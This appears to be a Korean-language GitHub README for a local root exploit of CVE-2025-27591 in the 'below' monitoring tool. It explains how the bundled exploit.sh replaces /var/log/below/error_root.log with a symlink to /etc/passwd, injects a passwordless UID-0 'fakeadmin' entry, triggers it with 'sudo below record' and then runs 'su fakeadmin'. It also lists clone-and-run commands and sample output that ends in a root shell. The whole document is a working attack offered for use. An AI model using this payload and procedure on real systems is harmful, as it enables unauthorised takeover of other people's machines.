
🔥 로컬 권한 상승 익스플로잇 for CVE-2025-27591 | Below의 전역 쓰기 가능 로그 디렉토리를 악용하여 /etc/passwd 주입을 통해 루트 권한 획득
below에서 심볼릭 링크 남용을 통한 권한 상승🛑 면책 조항: 이 익스플로잇은 교육 및 승인된 보안 테스트 용도로만 제공됩니다. 승인되지 않은 사용은 불법일 수 있습니다.
below는 Facebook이 Linux 시스템용으로 개발한 성능 모니터링 도구입니다. 패치 릴리스 이전의 below 버전은 전역 쓰기 가능 로그 디렉토리와 세니타이즈되지 않은 로그 처리를 악용하여 권한이 없는 사용자가 root로 권한을 상승시킬 수 있는 치명적인 취약점의 영향을 받습니다.
| 필드 | 값 |
|---|---|
| CVE 식별자 | CVE-2025-27591 |
| 심각도 | 🔥 치명적 (CVSS ≈ 7.8 - 8.8) |
| 공격 벡터 | 로컬 |
| 영향 | root(UID=0)로 권한 상승 |
| 익스플로잇 유형 | 심볼릭 링크 남용 / 로그 파일 주입 |
| 영향을 받는 앱 | below – 일반적으로 /usr/bin/below에 설치됨 |
| 근본 원인 | /var/log/below/에 대한 권한 확인 없이 안전하지 않은 파일 쓰기 |
이 Bash 스크립트는 다음을 수행합니다:
전역 쓰기 가능 디렉토리 확인:
/var/log/below가 전역 쓰기 가능한지 확인 (위험 신호).심볼릭 링크 공격 준비:
error_root.log(있는 경우)를 삭제하고 /etc/passwd로의 심볼릭 링크를 생성합니다.페이로드 구성:
/etc/passwd에 가짜 root 사용자를 추가합니다:
fakeadmin::0:0:fakeadmin:/root:/bin/bash
로깅 트리거:
sudo below record를 실행합니다.root 액세스 획득:
su fakeadmin을 사용합니다.CVE-2025-27591/
├── exploit.sh
├── README.md
익스플로잇을 실행하기 전에 다음이 있는지 확인하십시오:
/usr/bin/below/var/log/belowsudo 권한으로 실행: sudo below recordln (심볼릭 링크 생성)su (사용자 전환)timeout (실행 시간 제어)whoami (권한 확인 용)# 1. 저장소 클론
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591
# 2. 스크립트에 실행 권한 부여
chmod +x exploit.sh
# 3. 익스플로잇 실행
./exploit.sh
[*] CVE-2025-27591 취약점 확인 중...
[+] /var/log/below가 전역 쓰기 가능입니다.
[!] 기존 로그 파일 발견: 삭제 중...
[+] 심볼릭 링크 생성됨: /var/log/below/error_root.log -> /etc/passwd
[*] 악성 라인을 /tmp/fakeadmin에 쓰는 중
[*] 'sudo below record'를 통해 로깅 트리거 중...
[+] 'below record' 실행됨 (또는 시간 초과)
[*] 심볼릭 링크를 통해 /etc/passwd에 페이로드 쓰기 시도 중...
[+] 페이로드가 성공적으로 추가됨.
[*] 'su fakeadmin'을 사용하여 root 셸로 전환 시도 중...
root@target:/# whoami
root